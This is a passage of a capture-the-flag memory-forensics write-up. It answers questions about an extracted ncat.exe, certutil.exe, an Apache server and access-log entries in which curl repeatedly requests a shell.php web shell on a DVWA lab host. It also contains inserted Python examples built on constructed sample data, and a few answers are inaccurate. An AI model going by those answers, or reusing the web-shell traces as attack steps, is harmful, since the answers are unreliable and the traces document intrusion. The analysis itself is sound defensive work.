</pre></div></div><div><br /></div><div><b>Q: </b>What is the name of the section at index 0?</div><div><b>A:</b> .<i>text</i></div><div><br /></div><div><b>Q:</b> What does this section typically contain?</div><div><b>A:</b> The .text section is where the actual code is kept.</div><div><br /></div><div><b>Q:</b> What is the virtual memory address of the "<i>AddressOfEntryPoint</i>" for the executable?</div><div><b>A:</b> 00044663. This indicates the location of the entry point of the application; put another way, it is the address from which the Windows loader will begin execution.</div></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">objdump ncat_dump/file.0xe78bf6aa7120.0xe78bf313bdc0.ImageSectionObject.ncat.exe.img --all-headers | grep 'AddressOfEntryPoint'
BFD: error: ncat_dump/file.0xe78bf6aa7120.0xe78bf313bdc0.ImageSectionObject.ncat.exe.img(.reloc) is too large (0x3400 bytes)
AddressOfEntryPoint </span><b><span style="color: #fcff01;">00044663</span></b>
</pre></div></div><div><br /></div></div></div><div><div><b>Q:</b> What is the file size of the extracted file?</div><div><b>Q:</b> What is the File Modification Date/Time?</div><div><b>Q:</b> What is the file Access Date/Time?</div><div><b>Q:</b> What are the File Permissions?</div><div><b>Q:</b> What is the "Linker Version" used to link this file?</div><div><b>Q:</b> What is the Time Stamp on the file?</div><div><b>Q:</b> What is the OS Version, Image Version and Subsystem version?</div><div><b>Q:</b> What is the Subsystem?</div><div><br /></div><div><b>A:</b> All the answers can be found below:</div></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><b><span style="color: #fcff01;">exiftool </span></b><span style="color: white;">ncat_dump/file.0xe78bf6aa7120.0xe78bf313bdc0.ImageSectionObject.ncat.exe.img
ExifTool Version Number : 12.67
File Name : file.0xe78bf6aa7120.0xe78bf313bdc0.ImageSectionObject.ncat.exe.img
Directory : ncat_dump
File Size : 339 kB
File Modification Date/Time : 2023:12:07 09:35:35-05:00
File Access Date/Time : 2023:12:07 09:36:19-05:00
File Inode Change Date/Time : 2023:12:07 09:35:35-05:00
File Permissions : -rw-------
File Type : Win32 EXE
File Type Extension : exe
MIME Type : application/octet-stream
Machine Type : Intel 386 or later, and compatibles
Time Stamp : 2023:05:19 23:12:28-04:00
Image File Characteristics : Executable, 32-bit
PE Type : PE32
Linker Version : 14.29
Code Size : 279552
Initialized Data Size : 76288
Uninitialized Data Size : 0
Entry Point : 0x44663
OS Version : 6.0
Image Version : 0.0
Subsystem Version : 6.0
Subsystem : Windows command line</span></pre><div><br /></div></div></div></div><div><br /></div><div><div><b>Q:</b> What do the first 128 bytes of this file contain and what do they confirm?</div><div><b>A: </b>The first 128 bytes contain the following:</div><div>This confirms this is a Windows executable.</div></div><div><br /></div><div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><b><span style="color: #fcff01;">xxd -len 128</span></b><span style="color: white;"> ncat_dump/file.0xe78bf6aa7120.0xe78bf313bdc0.ImageSectionObject.ncat.exe.img
00000000: 4d5a 9000 0300 0000 0400 0000 ffff 0000 MZ..............
00000010: b800 0000 0000 0000 4000 0000 0000 0000 ........@.......
00000020: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000030: 0000 0000 0000 0000 0000 0000 1801 0000 ................
00000040: 0e1f ba0e 00b4 09cd 21b8 014c cd21 5468 ........!..L.!Th
00000050: 6973 2070 726f 6772 616d 2063 616e 6e6f is program canno
00000060: 7420 6265 2072 756e 2069 6e20 444f 5320 t be run in DOS
00000070: 6d6f 6465 2e0d 0d0a 2400 0000 0000 0000 mode....$.......</span>
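<span style="color: white;">The header fields that file, objdump and exiftool reported above (machine, section table, AddressOfEntryPoint, linker version, time stamp, OS and subsystem versions) pulled out of the PE headers with a small parser. This is an added example, not code from the post: the bytes it parses are a constructed minimal PE32 built from the values reported above (headers only, with an image base of 0x2e0000 assumed from the objdump VMAs), and is_pe() shows that the first 128 bytes alone only establish the MZ header and DOS stub, not the PE header itself.</span>

```python
import calendar
from datetime import datetime, timezone

# Values reported above for the extracted ncat.exe by objdump and exiftool. The blob built
# from them is a CONSTRUCTED minimal PE32 (headers only, no section bodies), not the real
# image from the memory dump; the image base is assumed from the objdump VMAs.
NCAT_TIMESTAMP = calendar.timegm((2023, 5, 20, 3, 12, 28))  # 2023:05:19 23:12:28-04:00
NCAT_IMAGE_BASE = 0x2E0000             # objdump VMA minus this gives the section RVA
NCAT_SECTIONS = [                      # name, RVA, virtual size, file offset
    (b".text",  0x01000, 0x442DD, 0x00400),
    (b".rdata", 0x46000, 0x0CCCE, 0x44800),
    (b".data",  0x53000, 0x00600, 0x51600),
    (b".rsrc",  0x56000, 0x001E0, 0x51C00),
    (b".reloc", 0x57000, 0x03400, 0x51E00),
]
MACHINES = {0x14C: "i386", 0x8664: "x86-64", 0x1C0: "ARM", 0xAA64: "ARM64"}
SUBSYSTEMS = {1: "native", 2: "Windows GUI", 3: "Windows console"}


def u16(data, off):
    return int.from_bytes(data[off:off + 2], "little")


def u32(data, off):
    return int.from_bytes(data[off:off + 4], "little")


def pack_fields(fields):
    """Pack (byte_width, value) pairs little-endian, in order."""
    return b"".join(v.to_bytes(w, "little") for w, v in fields)


def build_sample_pe(e_lfanew=0x118):
    """DOS header and stub, PE signature, COFF header, PE32 optional header, section table."""
    dos = bytearray(e_lfanew)
    dos[0:2] = b"MZ"
    dos[0x3C:0x40] = pack_fields([(4, e_lfanew)])      # e_lfanew = 0x118, as in the xxd output
    dos[0x4E:0x4E + 39] = b"This program cannot be run in DOS mode."
    coff = pack_fields([(2, 0x14C), (2, len(NCAT_SECTIONS)), (4, NCAT_TIMESTAMP),
                        (4, 0), (4, 0), (2, 224), (2, 0x0102)])  # i386, 5 sections, EXE|32-bit
    opt = pack_fields([
        (2, 0x10B), (1, 14), (1, 29),                   # PE32 magic, linker 14.29
        (4, 279552), (4, 76288), (4, 0),                # code / initialized / uninitialized size
        (4, 0x44663), (4, 0x1000), (4, 0x53000),        # AddressOfEntryPoint, BaseOfCode, BaseOfData
        (4, NCAT_IMAGE_BASE), (4, 0x1000), (4, 0x200),  # ImageBase, section and file alignment
        (2, 6), (2, 0), (2, 0), (2, 0), (2, 6), (2, 0), # OS 6.0, image 0.0, subsystem 6.0
        (4, 0), (4, 0x5B000), (4, 0x400), (4, 0),       # Win32Version, SizeOfImage/Headers, checksum
        (2, 3), (2, 0x8140),                            # Subsystem 3 = console, DllCharacteristics
        (4, 0x100000), (4, 0x1000), (4, 0x100000), (4, 0x1000), (4, 0), (4, 16),
    ]) + bytes(128)                                     # 16 empty data directories
    secs = b"".join(
        name.ljust(8, b"\0") + pack_fields([(4, vsize), (4, rva), (4, (vsize + 0x1FF) & ~0x1FF),
                                            (4, raw), (4, 0), (4, 0), (2, 0), (2, 0), (4, 0x60000020)])
        for name, rva, vsize, raw in NCAT_SECTIONS)
    return bytes(dos) + b"PE\0\0" + coff + opt + secs


def parse_pe(data):
    """Read back what file, objdump and exiftool reported: machine, sections, entry point, versions."""
    if data[:2] != b"MZ":
        raise ValueError("no MZ signature")
    e_lfanew = u32(data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature at e_lfanew")
    coff = e_lfanew + 4
    machine, nsec, ts = u16(data, coff), u16(data, coff + 2), u32(data, coff + 4)
    opt_size, chars = u16(data, coff + 16), u16(data, coff + 18)
    opt = coff + 20
    if u16(data, opt) != 0x10B:
        raise ValueError("only PE32 (32-bit) optional headers are handled here")
    aep = u32(data, opt + 16)
    sections = []
    for i in range(nsec):
        off = opt + opt_size + 40 * i
        sections.append({"name": data[off:off + 8].rstrip(b"\0").decode(), "vsize": u32(data, off + 8),
                         "rva": u32(data, off + 12), "raw_size": u32(data, off + 16), "raw_off": u32(data, off + 20)})
    # An entry point outside the code section is a classic sign of packing or tampering.
    entry_sec = next((s["name"] for s in sections if s["rva"] <= aep < s["rva"] + s["vsize"]), None)
    return {
        "machine": MACHINES.get(machine, hex(machine)),
        "is_executable": bool(chars & 0x0002),
        "num_sections": nsec,
        "timestamp": datetime.fromtimestamp(ts, timezone.utc).isoformat(),
        "linker": f"{data[opt + 2]}.{data[opt + 3]}",
        "code_size": u32(data, opt + 4),
        "entry_point": aep,
        "entry_section": entry_sec,
        "image_base": u32(data, opt + 28),
        "os_version": f"{u16(data, opt + 40)}.{u16(data, opt + 42)}",
        "subsystem_version": f"{u16(data, opt + 48)}.{u16(data, opt + 50)}",
        "subsystem": SUBSYSTEMS.get(u16(data, opt + 68), str(u16(data, opt + 68))),
        "sections": sections,
    }


def is_pe(data):
    """True only when the full PE header is present, not just the MZ header and DOS stub."""
    try:
        parse_pe(data)
        return True
    except ValueError:
        return False
```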
</pre></div></div><div><br /></div><div>Looking at prefetch files:</div><div><br /></div><div><b>Q:</b> How many prefetch files were returned?</div><div><b>A: </b>There were 45 Prefetch files returned</div></div><div><br /></div></div><div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">cat filescan.txt | grep --perl-regexp "\.pf" | awk --field-separator=' ' '{ print $2 }' | sort --unique | wc --lines
45</span>
</pre></div></div><div><br /></div><div>Analyzing the prefetch files allows us to understand how many times a program was run, when it was executed, etc.</div><div><br /></div><div>Extracting the <i>certutil.exe</i> file.</div></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">cat filescan.txt | grep certutil -i
</span><b><span style="color: #fcff01;">0xe78bf6e6ba90 \Windows\System32\certutil.exe</span></b><span style="color: white;"> 216
0xe78bf6e6e7e0 \Windows\Prefetch\CERTUTIL.EXE-28F1E0C1.pf 216
</span><b style="color: white;">0xe78bf7934500 \Windows\System32\en-US\certutil.exe.mui 216</b><b>
</b></pre></div></div><div><b><br /></b></div></div><div><div><b>Q:</b> What is the sha256 hash of this <i>certutil.exe</i> file found via the <i>filescan</i>?</div><div><b>A: </b></div></div></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">sha256sum certutil_dump/file.0xe78bf6e6ba90.0xe78bf7065d40.ImageSectionObject.certutil.exe.img
</span><b><span style="color: #fcff01;">e886ee1a0f92803e4b884ff099d9bbc717fe3cc6cd86f719d52f132776226493</span></b><span style="color: white;"> certutil_dump/file.0xe78bf6e6ba90.0xe78bf7065d40.ImageSectionObject.certutil.exe.img</span>
</pre><div><br /></div></div></div><div><br /></div></div><div><div>We know from our earlier analysis that we have an HTTP server.</div></div><div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">cat netstat.txt | grep http
0xe78bf3af4740 TCPv4 0.0.0.0 80 0.0.0.0 0 LISTENING 10008 httpd.exe 2023-11-16 23:26:16.000000
0xe78bf3af4740 TCPv6 :: 80 :: 0 LISTENING 10008 httpd.exe 2023-11-16 23:26:16.000000
0xe78bf3af5920 TCPv4 0.0.0.0 80 0.0.0.0 0 LISTENING 10008 httpd.exe 2023-11-16 23:26:16.000000
0xe78bf3af5ea0 TCPv4 0.0.0.0 443 0.0.0.0 0 LISTENING 10008 httpd.exe 2023-11-16 23:26:16.000000
0xe78bf3af5ea0 TCPv6 :: 443 :: 0 LISTENING 10008 httpd.exe 2023-11-16 23:26:16.000000
0xe78bf3af4060 TCPv4 0.0.0.0 443 0.0.0.0 0 LISTENING 10008 httpd.exe 2023-11-16 23:26:16.000000</span>
</pre></div></div><div><br /></div><div><b>Q:</b> What port(s) is the HTTP server listening on?</div><div><b>A:</b> 80 and 443</div><div><br /></div><div><b>Q:</b> Is the server listening on IPv4, IPv6, None or both?</div><div><b>A:</b> Both</div><div><br /></div><div><b>Q:</b> What is the name of the HTTP process?</div><div><b>A:</b> httpd.exe</div><div><br /></div><div><b>Q:</b> What are the process ID(s) associated with the HTTP process?</div><div><b>A:</b> 10008, 5088</div></div><div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">cat pslist.txt | grep httpd
10008 8100 httpd.exe 0xe78bf6fb6080 1 - 1 False 2023-11-16 23:26:15.000000 N/A Disabled
5088 10008 httpd.exe 0xe78bf61b9080 156 - 1 False 2023-11-16 23:26:16.000000 N/A Disabled</span>
</pre></div></div><div><br /></div><div>Still dealing with files, this time specifically files associated with HTTP; more specifically, the <i>"access.log" </i>file.</div><div><br /></div><div><b>Q:</b> How many entries for the "<i>access.log</i>" file were returned?</div><div><b>A:</b> There were 5 files returned.</div></div><div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">cat filescan.txt | grep "access.log"
0xe78bf4c62130 \xampp\apache\logs\access.log 216
0xe78bf6e72980 \xampp\apache\logs\access.log 216
0xe78bf6e72ca0 \xampp\apache\logs\access.log 216
0xe78bf6e75d10 \xampp\apache\logs\access.log 216
0xe78bf6e76800 \xampp\apache\logs\access.log 216
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat filescan.txt | grep "access.log" | wc --lines
5
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ mkdir access_log</span>
</pre><div><br /></div></div></div><div><br /></div><div>Extract the files from their memory address:</div></div><div><br /></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">~/volatility3/vol.py --output-dir access_log/ --file SECURITYNIK-WIN-20231116-235706.dmp windows.dumpfiles </span><b><span style="color: #fcff01;">--virtaddr 0xe78bf4c62130</span></b><span style="color: white;">
Volatility 3 Framework 2.5.2
Progress: 100.00 PDB scanning finished
Cache FileObject FileName Result
DataSectionObject 0xe78bf4c62130 access.log file.0xe78bf4c62130.0xe78bf6c3fdf0.DataSectionObject.access.log.dat
SharedCacheMap 0xe78bf4c62130 access.log file.0xe78bf4c62130.0xe78bf6564d20.SharedCacheMap.access.log.vacb
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ ~/volatility3/vol.py --output-dir access_log/ --file SECURITYNIK-WIN-20231116-235706.dmp windows.dumpfiles </span><span style="color: #fcff01;"><b>--virtaddr 0xe78bf6e72980</b></span><span style="color: white;">
Volatility 3 Framework 2.5.2
Progress: 100.00 PDB scanning finished
Cache FileObject FileName Result
DataSectionObject 0xe78bf6e72980 access.log file.0xe78bf6e72980.0xe78bf6c3fdf0.DataSectionObject.access.log.dat
SharedCacheMap 0xe78bf6e72980 access.log file.0xe78bf6e72980.0xe78bf6564d20.SharedCacheMap.access.log.vacb
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ ~/volatility3/vol.py --output-dir access_log/ --file SECURITYNIK-WIN-20231116-235706.dmp windows.dumpfiles </span><span style="color: #fcff01;"><b>--virtaddr 0xe78bf6e72ca0
Volatility 3 Framework 2.5.2</b></span><span style="color: white;">
Progress: 100.00 PDB scanning finished
Cache FileObject FileName Result
DataSectionObject 0xe78bf6e72ca0 access.log file.0xe78bf6e72ca0.0xe78bf6c3fdf0.DataSectionObject.access.log.dat
SharedCacheMap 0xe78bf6e72ca0 access.log file.0xe78bf6e72ca0.0xe78bf6564d20.SharedCacheMap.access.log.vacb
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ ~/volatility3/vol.py --output-dir access_log/ --file SECURITYNIK-WIN-20231116-235706.dmp windows.dumpfiles </span><span style="color: #fcff01;"><b>--virtaddr 0xe78bf6e75d10</b></span><span style="color: white;">
Volatility 3 Framework 2.5.2
Progress: 100.00 PDB scanning finished
Cache FileObject FileName Result
DataSectionObject 0xe78bf6e75d10 access.log file.0xe78bf6e75d10.0xe78bf6c3fdf0.DataSectionObject.access.log.dat
SharedCacheMap 0xe78bf6e75d10 access.log file.0xe78bf6e75d10.0xe78bf6564d20.SharedCacheMap.access.log.vacb
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ ~/volatility3/vol.py --output-dir access_log/ --file SECURITYNIK-WIN-20231116-235706.dmp windows.dumpfiles </span><b><span style="color: #fcff01;">--virtaddr 0xe78bf6e76800</span></b><span style="color: white;">
Volatility 3 Framework 2.5.2
Progress: 100.00 PDB scanning finished
Cache FileObject FileName Result
DataSectionObject 0xe78bf6e76800 access.log file.0xe78bf6e76800.0xe78bf6c3fdf0.DataSectionObject.access.log.dat
SharedCacheMap 0xe78bf6e76800 access.log file.0xe78bf6e76800.0xe78bf6564d20.SharedCacheMap.access.log.vacb</span>
</pre></div></div><div><br /></div></div></div><div><div><b>Q:</b> Upon dumping the memory address how many files are created?</div><div><b>A:</b> 10 files were reported for the 5 memory addresses which were extracted:</div></div><div><br /></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">ls
file.0xe78bf4c62130.0xe78bf6564d20.SharedCacheMap.access.log.vacb
file.0xe78bf4c62130.0xe78bf6c3fdf0.DataSectionObject.access.log.dat
file.0xe78bf6e72980.0xe78bf6564d20.SharedCacheMap.access.log.vacb
file.0xe78bf6e72980.0xe78bf6c3fdf0.DataSectionObject.access.log.dat
file.0xe78bf6e72ca0.0xe78bf6564d20.SharedCacheMap.access.log.vacb
file.0xe78bf6e72ca0.0xe78bf6c3fdf0.DataSectionObject.access.log.dat
file.0xe78bf6e75d10.0xe78bf6564d20.SharedCacheMap.access.log.vacb
file.0xe78bf6e75d10.0xe78bf6c3fdf0.DataSectionObject.access.log.dat
file.0xe78bf6e76800.0xe78bf6564d20.SharedCacheMap.access.log.vacb
file.0xe78bf6e76800.0xe78bf6c3fdf0.DataSectionObject.access.log.dat
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024/access_log]
└─$ ls | wc --lines
10</span>
</pre></div></div><div><br /></div></div><div><div>Now that we have the files, let's answer the following question.</div><div><br /></div><div><b>Q:</b> What is/are the IP address(es) and its/their count(s) for the IP(s) seen in all the "<i>access.log</i>" files?</div><div><b>A:</b> </div></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">cat access_log/* | sort --unique | awk --field-separator='-' '{ print $1 }' | sort | uniq --count
...
57 10.0.0.1
19 10.0.0.110</span>
</pre><div><br /></div></div></div><div><br /></div></div></div><div><div>There is a device which seems to be accessing our web server with a non-GUI based browser. </div><div><br /></div><div><b>Q:</b> What is the IP of this host?</div><div><b>A:</b> 10.0.0.110</div><div><br /></div><div><b>Q:</b> What is the HTTP Method/Verb used by this non-GUI based browser tool?</div><div><b>A:</b> "GET"</div><div><br /></div><div><b>Q:</b> What are the URLs accessed?</div><div><b>A:</b> "<i>/dvwa/vulnerabilities/exec/shell.php"</i></div><div><br /></div><div><b>Q</b>: What version of HTTP is in use?</div><div><b>A</b>: HTTP/1.1</div><div><br /></div><div><b>Q</b>: What was/were the response code(s)?</div><div><b>A</b>: 200. </div><div><br /></div><div><b>Q:</b> For the response code(s), is/are this/these server and client codes?</div><div><b>A:</b> Both client and server: 200 is the server's success code, 404 is a client-side error.</div><div><br /></div><div><b>Q:</b> What is the smallest size of the object/response returned to the requestor using this non-GUI based browser?</div><div><b>A:</b> 29</div><div><br /></div><div><b>Q:</b> What is the largest size of the object/response returned to the requestor using this non-GUI based browser?</div><div><b>A:</b> 2888</div><div><br /></div><div><b>Q:</b> What is the name of this non-GUI based browser?</div><div><b>A:</b> curl</div><div><br /></div><div><b>Q:</b> What version of this non-GUI browser was being used?</div><div><b>A:</b> 8.4.0</div><div><br /></div><div>Below we see a sample of these entries; they hold the answers to all the questions above.</div></div></div><div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">cat access_log/* | sort --unique | grep --color=always --text 'curl'
10.0.0.110 - - [16/Nov/2023:18:19:50 -0500] "GET /dvwa/vulnerabilities/exec/shell.php HTTP/1.1" 200 335 "-" "curl/8.4.0"
10.0.0.110 - - [16/Nov/2023:18:20:11 -0500] "GET /dvwa/vulnerabilities/exec/shell.php HTTP/1.1" 200 335 "-" "curl/8.4.0"
10.0.0.110 - - [16/Nov/2023:18:24:45 -0500] "GET /dvwa/vulnerabilities/exec/shell.php HTTP/1.1" 200 335 "-" "curl/8.4.0"
10.0.0.110 - - [16/Nov/2023:18:26:37 -0500] "GET /dvwa/vulnerabilities/exec/shell.php HTTP/1.1" 200 335 "-" "curl/8.4.0"
10.0.0.110 - - [16/Nov/2023:18:26:54 -0500] "GET /dvwa/vulnerabilities/exec/shell.php HTTP/1.1" 200 335 "-" "curl/8.4.0"
10.0.0.110 - - [16/Nov/2023:18:28:01 -0500] "GET /dvwa/vulnerabilities/exec/main.php HTTP/1.1" 404 297 "-" "curl/8.4.0"
10.0.0.110 - - [16/Nov/2023:18:28:09 -0500] "GET /dvwa/vulnerabilities/exec/shell.php HTTP/1.1" 200 335 "-" "curl/8.4.0"
10.0.0.110 - - [16/Nov/2023:18:28:25 -0500] "GET /dvwa/vulnerabilities/exec/shell.php HTTP/1.1" 200 335 "-" "curl/8.4.0"
10.0.0.110 - - [16/Nov/2023:18:36:02 -0500] "GET /dvwa/hackable/uploads/shell.php HTTP/1.1" 404 297 "-" "curl/8.4.0"
10.0.0.110 - - [16/Nov/2023:18:36:09 -0500] "GET /dvwa/hackable/upload/shell.php HTTP/1.1" 404 297 "-" "curl/8.4.0"
10.0.0.110 - - [16/Nov/2023:18:37:32 -0500] "GET /dvwa/vulnerabilities/upload/shell.php HTTP/1.1" 200 29 "-" "curl/8.4.0"
10.0.0.110 - - [16/Nov/2023:18:41:22 -0500] "GET /dvwa/vulnerabilities/upload/shell.php HTTP/1.1" 200 2888 "-" "curl/8.4.0"</span>
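As an added example, not code from the original post, the following Python parses Apache combined-format access log lines and derives the answers above (source IP, method, paths, protocol, status codes and their class, smallest and largest response, client name and version) for every request not made by a GUI browser. The curl lines are copied from the listing above; the first line, a regular browser request from 10.0.0.112, is constructed for this example so the filter has something to exclude, and the "User-Agent starts with Mozilla/ means GUI browser" heuristic is this example's assumption. Unlike the one-line answer key, it reports every distinct path the non-GUI client touched, including the 404s.

```python
import re
from collections import Counter

# Sample access log: the curl entries are copied from the listing above; the
# first line (a regular browser request from 10.0.0.112) is constructed for
# this example so that the GUI-browser filter has something to exclude.
SAMPLE_ACCESS_LOG = """\
10.0.0.112 - - [16/Nov/2023:18:10:02 -0500] "GET /dvwa/login.php HTTP/1.1" 200 1523 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
10.0.0.110 - - [16/Nov/2023:18:19:50 -0500] "GET /dvwa/vulnerabilities/exec/shell.php HTTP/1.1" 200 335 "-" "curl/8.4.0"
10.0.0.110 - - [16/Nov/2023:18:28:01 -0500] "GET /dvwa/vulnerabilities/exec/main.php HTTP/1.1" 404 297 "-" "curl/8.4.0"
10.0.0.110 - - [16/Nov/2023:18:36:02 -0500] "GET /dvwa/hackable/uploads/shell.php HTTP/1.1" 404 297 "-" "curl/8.4.0"
10.0.0.110 - - [16/Nov/2023:18:37:32 -0500] "GET /dvwa/vulnerabilities/upload/shell.php HTTP/1.1" 200 29 "-" "curl/8.4.0"
10.0.0.110 - - [16/Nov/2023:18:41:22 -0500] "GET /dvwa/vulnerabilities/upload/shell.php HTTP/1.1" 200 2888 "-" "curl/8.4.0"
"""

# Apache "combined" log format: host ident user [time] "request" status size "referer" "user-agent"
COMBINED_LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) (?P<proto>HTTP/[\d.]+)" '
    r'(?P<status>\d{3}) (?P<size>\d+|-) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)


def parse_access_line(line: str):
    """Return a dict of fields for one combined-format line, or None if it does not parse."""
    m = COMBINED_LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["size"] = None if rec["size"] == "-" else int(rec["size"])   # "-" means no body was sent
    return rec


def user_agent_product(ua: str):
    """'curl/8.4.0' -> ('curl', '8.4.0'); only the first product token is used."""
    name, _, rest = ua.partition("/")
    return name, (rest.split()[0] if rest else "")


def is_gui_browser(ua: str) -> bool:
    """Assumption of this example: mainstream GUI browsers announce themselves as 'Mozilla/5.0 ...'."""
    return ua.startswith("Mozilla/")


def status_class(code: int) -> str:
    """HTTP status classes: 2xx success, 3xx redirection, 4xx client error, 5xx server error."""
    return {2: "success", 3: "redirection", 4: "client error", 5: "server error"}.get(code // 100, "informational")


def summarize_non_gui_clients(log_text: str) -> dict:
    """Answer the questions above for every request not made by a GUI browser."""
    records = [r for r in map(parse_access_line, log_text.splitlines())
               if r is not None and not is_gui_browser(r["ua"])]
    sizes = [r["size"] for r in records if r["size"] is not None]
    status_counts = dict(Counter(r["status"] for r in records))
    return {
        "ips": sorted({r["ip"] for r in records}),
        "methods": sorted({r["method"] for r in records}),
        "paths": sorted({r["path"] for r in records}),
        "protocols": sorted({r["proto"] for r in records}),
        "status_counts": status_counts,
        "status_classes": {code: status_class(code) for code in status_counts},
        "min_size": min(sizes) if sizes else None,
        "max_size": max(sizes) if sizes else None,
        "user_agents": sorted({user_agent_product(r["ua"]) for r in records}),
    }


if __name__ == "__main__":
    for key, value in summarize_non_gui_clients(SAMPLE_ACCESS_LOG).items():
        print(f"{key}: {value}")
```

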